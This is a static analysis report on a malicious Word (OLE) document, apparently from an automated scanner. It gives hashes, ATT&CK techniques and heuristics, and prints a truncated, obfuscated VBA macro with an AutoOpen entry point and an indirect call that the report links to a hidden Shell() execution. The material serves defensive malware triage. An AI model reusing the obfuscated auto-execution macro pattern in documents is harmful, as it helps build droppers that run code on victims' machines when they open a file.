Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c58a2fa536160c4f…

MALICIOUS

Office (OLE)

101.4 KB Created: 2018-09-26 07:24:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: 833e92825df64a697cefa10b4004cb65 SHA-1: 35ee96df1dfea94ecedc4da2ed8b46c89f8efd6c SHA-256: c58a2fa536160c4fb51ab754e711af1e077c964f4c098b03a13e4024bfa76f31
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. Because the macro is obfuscated and the extracted source is truncated, a more detailed analysis of its specific payload or target was not possible.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body); this is an Office DrawingML XML namespace identifier, which explains its presence in the document body.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 62074 bytes
SHA-256: 2ca8fa8d51e73a12205330841da19ebe05d5a5d3d8f65fb4967073c80fa2564d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ZXvczYjD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Export attributes of the first module ("ZXvczYjD"); VB_Base ties it to Normal.ThisDocument.
' These are metadata written by the VBA project export, not executable statements.
' AutoOpen is the auto-execution entry point that Word runs when the document is opened
' (the marker behind the OLE_VBA_AUTOOPEN and OLE_LEGACY_WORDBASIC_AUTOEXEC findings).
' Every Dim/assignment below builds strings from identifiers that are declared nowhere in
' the previewed source, and none of these local arrays is read again inside this Sub;
' this looks like junk padding around the single call in the middle — confirm against
' the full 62074-byte extract.
Sub AutoOpen()
   Dim jBjjb(2)
jBjjb(0) = MidB(HEzNh + NHvasnAMkwOnjALRQj + fPizp, 659, 183) + Right(zOLbkjPo + ovmNVhrzCQjzPKKpLaD + OZIozTvc, 921)
jBjjb(1) = Mid(HtCNP + MzhSQvUWFwJBnwwYD + GnksGwW, 162, 944) + Right(MqmRvI + izpimEwFDQruquhYoaz + YvouY, 417) + MidB(LmqfRJwo + QEjiTHwXNkYjhFqPdX + dfICD, 492, 710) + Left(FajJcpc + cwpDmvIjDIYGcjDLREWm + TPAaF, 304)
   Dim qumLZs(2)
qumLZs(0) = Left(GphaLzzA + mRDiGLDTjIVuiPiusdL + zjFDpU, 344) + Mid(jdwrIo + WYjkltjjjPvbSfkZ + OzOIA, 965, 196) + Left(HtTqHmSn + LXIkCtkCdLXuHZScl + itcWmWn, 782) + MidB(XEujFOMO + HUbjfwzMALbHcojGmzN + zKaLCL, 118, 255)
qumLZs(1) = Right(bORsrnan + jwwSvFfHFQtqHYkzBuz + AZzQp, 366) + Mid(ldmDN + MFaFojYJIWPpqiPoSV + qotGHNUj, 149, 328)
   Dim vTstYR(1)
vTstYR(0) = Right(HTDWSKXE + pvUQjQdaKocOwVlqVQATD + lXnzpQ, 852) + MidB(ZQikcwu + ziEFAMflSHpbQjWpdVYkf + pABNWVIc, 92, 54) + MidB(XaRDCab + AvYzbFOVuZjEXikmjwLjszz + RVKDk, 969, 781) + Right(QuQuHdI + SDnTCipFoPjzcrCDWwFjZHj + mrhYzD, 638)
   Dim GOzzl(2)
GOzzl(0) = Right(AXGcK + lmkAntOwjaIbFpijONBrI + ShGbifN, 143) + Right(zHFqrPS + cuAKoUiAVkvcbhkUB + TXJldIqW, 974)
GOzzl(1) = Mid(mFnRWR + ANlzkVAOJizSahADqFoiX + pMQJLS, 278, 717) + Left(iZYPnIb + lFLYMoOPJMjOfdjFwL + fzsDbnD, 946)
   Dim oUToDN(1)
oUToDN(0) = MidB(qjzrJD + ZiMdNGimFXmYvJIkrivOB + tvCKlTqc, 461, 136) + Right(Mipjs + XpvZoHMzLdTLKVNiTEvvXCP + WCzDRKv, 55) + Left(NDZTzR + hBrVGwGdctYXYibOZCAOSPM + ukvicPi, 461) + Right(vAznY + ZzoUzLCVkjmYFXiBjOwH + icsNb, 290)
   Dim JpNhOz(2)
JpNhOz(0) = Right(cHfBlVv + aEXnudrKPNSotVEQjsJlG + ocpYNhr, 744) + MidB(EIOMV + ihRnNwuGfUSRqHoP + BjbCsKA, 660, 2)
JpNhOz(1) = MidB(JFDZf + SsiHCXErnRHXGaAqlVzwM + JZLPsLI, 265, 953) + Mid(uiDzI + QsfEinYoOFSwaNfYb + wJIJK, 727, 424) + MidB(NfivMvEq + TWuIiTptqSjrRVwYdlCCa + NWofIoBj, 535, 670) + MidB(dqUsS + dnQkSZRuGQUrFTEYh + HqcrUSi, 166, 860)
' The only statement whose result leaves this Sub: CELrPEMmjiPRav is invoked with a string
' assembled from KeyString(...) results, further undeclared identifiers, and the return value
' of hwJAkrcdPi (the Function in the second module below). Neither CELrPEMmjiPRav nor
' KeyString is defined in the previewed portion, and the Shell() call reported by
' OLE_VBA_SHELL is not visible here — presumably it sits in one of those callees or in the
' truncated remainder; verify against the full extract before attributing a payload.
CELrPEMmjiPRav (KeyString(SfNizzqv + YrDXXX + 3 + 21 + 43 + TOLTd + HHqhuu) + FnFIUGj + Qhwuo + KeyString(bFUrK + BuKsszOY + 3 + 24 + 50 + MzkSPcGk + CvWYTzpF) + hwJAkrcdPi + kpaPVKIjC + DjjLkMC + LXztiuj + FhUSXEib + qmtBicvR + QRdnE + EzbizTdK)
' More padding of the same shape; none of these arrays is referenced after assignment.
   Dim lOVplq(1)
lOVplq(0) = Left(JwArKK + fMuFZoXjiVbUSOZPwo + mDhXnmZU, 823) + Mid(buGPFwt + DVuBJidkvTkiBsRil + iztYcM, 969, 378) + Left(rvpRJ + LEwjvKwbwONfLLrzHkzWiR + tidqsL, 64) + MidB(NiimCbB + FnrfAAaYdMiRuzOzIW + oihKIKF, 168, 958)
   Dim ZWNIC(2)
ZWNIC(0) = MidB(ZTkuaMM + LfwBqfJGkFzAZDsXqDt + zOkkudmO, 652, 643) + MidB(OiTumECS + ZuKiXToORREEwPdzqPSQ + VZdEz, 840, 926) + Right(ppaQGT + TqhJdrnoZUcTGdBuLFPaU + nFYzWiQr, 989) + MidB(trhiQKSb + iLsoFZOSQMdoEpCqLcH + iKMjpEHt, 693, 892)
ZWNIC(1) = Mid(jLRECYvK + DdlBVPkTbHDGudzITstA + illJDLt, 127, 347) + Mid(unjrIzb + cFWsTvwOXJdniwaPQOzo + npQRKtS, 447, 225) + Right(OtqHPs + wGHVrMKZMYiRiGfjEiqF + SPEkI, 11) + MidB(tpXjT + ATGKnIffKAjIHAfKZz + DMCZXtrz, 743, 142)
   Dim Kjvoj(2)
Kjvoj(0) = MidB(ZZHQNRd + AJwHviwkCkmOcdjF + rbPNj, 300, 911) + MidB(IuLUzdIY + jzDjZzktokhXKijtOO + vupaU, 230, 712) + Mid(bZrHn + QvBBHEaWCquYiXuHmjW + IUfGw, 371, 191) + Left(ucTNGvrT + SVqvZhHNjHFuimYUYhsVG + aDRwQ, 362)
Kjvoj(1) = MidB(whSZFZrz + joioPNISusZAkQXGOPooz + bNSujh, 922, 629) + MidB(TloEqzTV + jhJiSnhZrzlHzlENKdT + EUOzYS, 415, 366) + MidB(ktEkc + OHiqhdquwOHsujdzZAJ + jrzNsr, 310, 553) + Mid(PLcjWqX + VHLBNWWGiTjFAqidaD + nRfBuAG, 136, 25)
End Sub


Attribute VB_Name = "LpYOidQjnaKzwL"
' Start of the second exported module ("LpYOidQjnaKzwL"); the Function that follows is
' referenced by name inside AutoOpen's call argument, so it runs as part of that call.
Function hwJAkrcdPi()
Dim LMPZz(1)
LMPZz(0) = MidB(oPoNi + rLIoGJziRiAkZonHm + TuSLIVfG, 232, 276) + MidB(cRSIKj + iwqcZDpzabzrNWv + TbFUEKYS, 130, 605) + MidB(plPUDpm + pGlmNPZFmPbIsWYOiliUw + XiXJj, 168, 970) + Mid(VThquut + MwhsMahRbjHmmlvCvGHdlO + ohUjsh, 530, 736)
   Dim kBrSEf(1)
kBrSEf(0) = Mid(jLNJjkDp + TOvqZmhLJVsfnuCCtPaF + FXXWB, 297, 514) + MidB(iPwucEb + tdrfZONAmEztjTPUK + uazFfTca, 958, 341)
   Dim Ml
... (truncated)